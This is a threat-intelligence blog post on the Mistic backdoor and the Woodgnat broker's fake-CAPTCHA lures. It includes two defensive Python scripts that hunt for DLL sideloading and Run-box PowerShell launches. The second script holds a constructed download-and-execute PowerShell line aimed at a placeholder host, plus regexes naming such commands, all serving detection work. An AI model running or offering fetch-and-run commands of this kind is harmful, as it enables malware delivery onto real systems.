
Be on the lookout for Mistic, a new backdoor used by ransomware broker


🚨 Researchers have identified a new backdoor program named Mistic that has been used in enterprise intrusions since April. This malware is linked to an initial access broker that sells network footholds to ransomware gangs.

Key Highlights:

  • Multiple Sectors Affected: Mistic has been deployed on networks belonging to organizations in insurance, education, IT, and professional services.
  • Associated Malware: It has been used alongside ModeloRAT, malware associated with the threat actor Woodgnat (also known as KongTuke).
  • Attack Method: Mistic is launched through DLL sideloading: a legitimate, usually signed, executable is run and loads a malicious DLL planted beside it, so the backdoor executes inside a trusted process and is less likely to draw attention.
  • Stealthy Operations: Mistic runs in memory rather than from disk and includes a kill switch, features aimed at long-term, low-footprint access for the attackers.

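The sideloading mechanism above is also the most tractable thing to hunt for. The following is an added example, not code from the Symantec report: it walks Sysmon-style "image loaded" records (event ID 7 carries the loading process, the DLL path and signature status) and flags a system-named DLL that an executable loads from its own directory instead of the Windows system directory, with a signed executable loading an unsigned DLL as the strongest signal. The record fields, the DLL list and the sample events are constructed for the example.

```python
"""Hunt for DLL sideloading in image-load telemetry (added example)."""
from dataclasses import dataclass
from typing import List, Optional, Tuple
import ntpath  # Windows path semantics, so this runs on any host

# DLL names that belong in the Windows system directory. Constructed,
# deliberately short list; a real hunt derives it from a golden image.
SYSTEM_DLLS = {
    "version.dll", "dbghelp.dll", "wtsapi32.dll",
    "cryptsp.dll", "userenv.dll", "profapi.dll",
}

SYSTEM_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\windows\\winsxs\\",
)


@dataclass(frozen=True)
class ImageLoad:
    process_image: str    # executable that performed the load
    image_loaded: str     # full path of the DLL that was loaded
    process_signed: bool  # executable has a valid Authenticode signature
    dll_signed: bool      # DLL has a valid Authenticode signature


def in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def sideload_reason(ev: ImageLoad) -> Optional[str]:
    """Return why the load looks like sideloading, or None if it does not."""
    dll_name = ntpath.basename(ev.image_loaded).lower()
    if dll_name not in SYSTEM_DLLS or in_system_dir(ev.image_loaded):
        return None  # ordinary DLL, or loaded from where it belongs
    same_dir = (ntpath.dirname(ev.image_loaded).lower()
                == ntpath.dirname(ev.process_image).lower())
    if not same_dir:
        return None  # search-order abuse elsewhere is a different hunt
    exe_name = ntpath.basename(ev.process_image)
    if ev.process_signed and not ev.dll_signed:
        return f"signed {exe_name} loaded unsigned {dll_name} from its own directory"
    if not ev.dll_signed:
        return f"unsigned {dll_name} loaded from application directory"
    return None  # both signed: likely a vendor redistributable, review manually


def hunt(events: List[ImageLoad]) -> List[Tuple[str, str, str]]:
    """Return (process_image, image_loaded, reason) for each suspicious load."""
    hits = []
    for ev in events:
        reason = sideload_reason(ev)
        if reason:
            hits.append((ev.process_image, ev.image_loaded, reason))
    return hits


# Constructed sample telemetry (not indicators from the report).
SAMPLE_EVENTS = [
    # Signed vendor tool dropped into Temp next to an unsigned version.dll
    ImageLoad(r"C:\Users\alice\AppData\Local\Temp\VendorTool.exe",
              r"C:\Users\alice\AppData\Local\Temp\version.dll", True, False),
    # Same tool loading the genuine version.dll from System32: benign
    ImageLoad(r"C:\Users\alice\AppData\Local\Temp\VendorTool.exe",
              r"C:\Windows\System32\version.dll", True, True),
    # Application loading its own, non-system-named library: benign
    ImageLoad(r"C:\Program Files\Vendor\Tool.exe",
              r"C:\Program Files\Vendor\vendorcore.dll", True, False),
    # Unsigned loader plus unsigned wtsapi32.dll in the same folder
    ImageLoad(r"C:\ProgramData\Update\update.exe",
              r"C:\ProgramData\Update\wtsapi32.dll", False, False),
]

if __name__ == "__main__":
    for proc, dll, why in hunt(SAMPLE_EVENTS):
        print(f"[!] {proc} -> {dll}: {why}")
```

The heuristic deliberately ignores a system-named DLL loaded from a third directory; that is search-order hijacking rather than sideloading and deserves its own rule. Expect some noise from vendors that legitimately ship their own copies of redistributable DLLs, which is why the reason string distinguishes the signed-executable case from the rest.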
Attack Campaigns:

The Woodgnat group's campaigns often trick users into running malicious PowerShell commands themselves, using social engineering such as fake CAPTCHA pages and impersonation of IT support on Microsoft Teams.
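The fake-CAPTCHA lure works by persuading the victim to paste a command into the Windows Run box, which leaves a recognisable process tree: explorer.exe spawning an interpreter with a hidden window and an encoded or download-and-execute command line. The following is an added example, not code from the report, that scans constructed process-creation records for that pattern and decodes -EncodedCommand payloads so the indicators hidden inside them are visible too. The record layout, the indicator list and the sample events are constructed for the example; example.invalid is a reserved name.

```python
"""Flag Run-dialog interpreter launches typical of fake-CAPTCHA lures (added example)."""
import base64
import ntpath
import re
from typing import List, Tuple

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# (label, regex) pairs matched against the command line and against the
# decoded -EncodedCommand text. Constructed for the example.
INDICATORS = [
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded-command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("web-download", re.compile(r"\b(?:irm|iwr)\b|invoke-restmethod|invoke-webrequest|downloadstring", re.I)),
    ("url", re.compile(r"https?://", re.I)),
]

_ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of a PowerShell -EncodedCommand argument, or ''."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        # PowerShell expects base64 over UTF-16LE, not UTF-8
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score(parent_image: str, image: str, cmdline: str) -> List[str]:
    """Indicator labels matched for one process-creation record."""
    if ntpath.basename(parent_image).lower() != "explorer.exe":
        return []  # Run box and File Explorer launches have explorer.exe as parent
    if ntpath.basename(image).lower() not in INTERPRETERS:
        return []
    text = cmdline + "\n" + decode_encoded_command(cmdline)
    return [label for label, rx in INDICATORS if rx.search(text)]


def detect(events: List[Tuple[str, str, str]], min_indicators: int = 2):
    """Return (cmdline, indicators) for records meeting the threshold."""
    hits = []
    for parent, image, cmdline in events:
        found = score(parent, image, cmdline)
        if len(found) >= min_indicators:
            hits.append((cmdline, found))
    return hits


def _b64_utf16(s: str) -> str:
    return base64.b64encode(s.encode("utf-16le")).decode()


EXPLORER = r"C:\Windows\explorer.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PAYLOAD = "iex (irm https://example.invalid/v)"  # constructed stage-two fetch

# Constructed sample records: (parent image, image, command line)
SAMPLE_EVENTS = [
    # Pasted into Run by the victim: hidden window, encoded download-and-run
    (EXPLORER, PS, "powershell.exe -w hidden -enc " + _b64_utf16(PAYLOAD)),
    # Same payload from a cmd.exe parent: out of scope for this rule
    (r"C:\Windows\System32\cmd.exe", PS, "powershell.exe -w hidden -enc " + _b64_utf16(PAYLOAD)),
    # Administrator opening PowerShell from the Run box: benign
    (EXPLORER, PS, "powershell.exe -NoProfile -Command Get-ChildItem"),
    # mshta from the Run box with a remote URL: one indicator only
    (EXPLORER, r"C:\Windows\System32\mshta.exe", "mshta https://example.invalid/c.hta"),
]

if __name__ == "__main__":
    for cmdline, found in detect(SAMPLE_EVENTS):
        print(f"[!] {found}: {cmdline[:60]}...")
```

With the default threshold of two indicators the mshta record is not flagged; lowering it to one catches it at the cost of more noise, so tune the threshold against your own telemetry. The explorer.exe parent is specific to the Run-box variant of the lure; a Teams-based IT-support pretext produces a different process tree and needs its own rule. On the forensic side, commands typed into the Run box are also recorded under the user's RunMRU registry key, which is worth checking when you triage a suspected victim.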

Conclusion:

The emergence of Mistic highlights a return to custom malware tooling among ransomware actors, rather than relying solely on dual-use system administration tools. The Symantec report includes indicators of compromise for this new backdoor and for other malicious files used in recent attacks.


This post is licensed under CC BY 4.0 by the author.